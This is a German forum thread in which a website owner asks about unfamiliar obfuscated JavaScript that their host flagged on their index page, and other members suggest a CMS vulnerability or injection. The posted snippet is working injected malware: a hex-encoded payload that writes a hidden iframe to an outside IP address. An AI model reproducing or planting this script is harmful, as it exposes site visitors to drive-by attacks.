• 22.05.2024, 06:44
  • Registrieren
  • Anmelden
  • Sie sind nicht angemeldet.

 

Lieber Besucher, herzlich willkommen bei: Aqua Computer Forum. Falls dies Ihr erster Besuch auf dieser Seite ist, lesen Sie sich bitte die Hilfe durch. Dort wird Ihnen die Bedienung dieser Seite näher erläutert. Darüber hinaus sollten Sie sich registrieren, um alle Funktionen dieser Seite nutzen zu können. Benutzen Sie das Registrierungsformular, um sich zu registrieren oder informieren Sie sich ausführlich über den Registrierungsvorgang. Falls Sie sich bereits zu einem früheren Zeitpunkt registriert haben, können Sie sich hier anmelden.

amok

Senior Member

Merkwürdiger Code auf der eigenen HP?

Mittwoch, 30. April 2008, 13:09

Hi zusammen!

Habe ein großes Problem. Ich habe eine eigene Webseite und heute von 1und1 eine Mail erhalten das wohl "schädlicher Code" auf meiner Seite wäre. Habe mir die entsprechende Seite mal angeschaut und die Leute haben Recht, da sind ein paar Zeilen die ich nicht kenne und auch nicht geschrieben habe.

Quellcode

1
2
3
4
5
6
7
8
9
10
11
<script>function v481812eb804ea(v481812eb808d2){ function v481812eb80cbc () {var v481812eb810a1=16; return v481812eb810a1;} return(parseInt

(v481812eb808d2,v481812eb80cbc()));}function v481812eb8148c(v481812eb81874){ function v481812eb837d3 () {return 2;} var v481812eb81c85='';for(v481812eb82b2e=0; 

v481812eb82b2e<v481812eb81874.length; v481812eb82b2e+=v481812eb837d3()){ v481812eb81c85+=(String.fromCharCode(v481812eb804ea(v481812eb81874.substr(v481812eb82b2e, v481812eb837d3()))));}return v481812eb81c85;} document.write

(v481812eb8148c('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D6
5206E616D653D313465207372633D5C27687474703A2F2F3737
2E3232312E3133332E3135302F2E69662F676F2E68746D6C3F27
2B4D6174682E726F756E64284D6174682E72616E646F6D28292A3637333438292B276561363636363933625C272077696474683D343532206865696768743D313439207374796C653D5C27646973
706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>


Kann damit einer was Anfangen? Was ist das? Und wie kommt das in meinen Quellcode? Bin da für jeden Tipp dankbar!

Greetz
amok

Re: Merkwürdiger Code auf der eigenen HP?

Mittwoch, 30. April 2008, 13:23

WordPress?

amok

Senior Member

Re: Merkwürdiger Code auf der eigenen HP?

Mittwoch, 30. April 2008, 13:29

Zitat von »Y0Gi«

WordPress?



??? Sorry, kann dir nicht folgen :)

Re: Merkwürdiger Code auf der eigenen HP?

Mittwoch, 30. April 2008, 14:09

Zitat

WordPress ist ein Weblog-Publishing-System (auch CMS), das vorwiegend bei der Erstellung von häufig zu aktualisierenden Websites, im Besonderen von Weblogs, eingesetzt wird. Es basiert auf der Skriptsprache PHP und benötigt eine MySQL-Datenbank. WordPress ist Freie Software, die unter der GNU General Public License lizenziert wurde. Die quelloffene Software stellen die Programmierer auf der Website kostenlos zum Download bereit. Die Entwickler von WordPress legen besonderen Wert auf Webstandards, Eleganz, Benutzerfreundlichkeit und leichte Anpassbarkeit der Software.


Quelle: http://de.wikipedia.org/wiki/Wordpress

Aber was es damit zu tun hat, ist mir schleierhaft. Bei mir laufen auch mehrere WordPress Scripts problemlos.

amok

Senior Member

Re: Merkwürdiger Code auf der eigenen HP?

Mittwoch, 30. April 2008, 14:12

@Draco: Ich habe aber auch gar kein WordPress Skript auf meiner Seite. Dieses Skript ist merkwürdigerweise auf der Index Seite erstellt worden und in meinem Backup nicht vorhanden....

sehr merkwürdig!

Re: Merkwürdiger Code auf der eigenen HP?

Mittwoch, 30. April 2008, 17:16

Ich fragte danach, ob du WordPress einsetzt. Ich habe eine Zeit lang regelmäßig WP-Sites gefunden, die mit Spam-Links erweitert wurden, die über eine Sicherheitslücke eingeschleust wurden (was nicht gerade eine Seltenheit ist).

Wenn du ausschließen kannst, dass jemand über die Website selbst (Admin-Bereich o.ä.) eingedrungen ist, liegt ein Einbruch auf tieferer Ebene nahe.

Liegt deine Website bei 1&1 oder ist das ein eigener Server?

Re: Merkwürdiger Code auf der eigenen HP?

Mittwoch, 30. April 2008, 19:01

hast du mal einen link zu deiner seite ?
benutzt du ein fertiges oder ein selbst erstelltes skript ?
was auch immer du benutzt, es ist vermutlich anfällig für xss, injections oder ähnliches.
Viele Grüße Till

amok

Senior Member

Re: Merkwürdiger Code auf der eigenen HP?

Dienstag, 6. Mai 2008, 19:23

Zitat von »Y0Gi«

Ich fragte danach, ob du WordPress einsetzt. Ich habe eine Zeit lang regelmäßig WP-Sites gefunden, die mit Spam-Links erweitert wurden, die über eine Sicherheitslücke eingeschleust wurden (was nicht gerade eine Seltenheit ist).

Wenn du ausschließen kannst, dass jemand über die Website selbst (Admin-Bereich o.ä.) eingedrungen ist, liegt ein Einbruch auf tieferer Ebene nahe.

Liegt deine Website bei 1&1 oder ist das ein eigener Server?


liegt direkt bei 1und1 und ist mitlerweile gesperrt worden, owohl ich den merkwürdigen Code entfernt hattte, war er plötzlich wieder da???

Verrückt!

Re: Merkwürdiger Code auf der eigenen HP?

Dienstag, 6. Mai 2008, 23:37

wundert mich jetzt nicht, da du ja anscheinend nur die symptome beseitigt hast, nicht aber die ursache.
und da du ja nicht verraten willst, welche portal-/foren-/blog-/whatever-software du einsetzt ...
Viele Grüße Till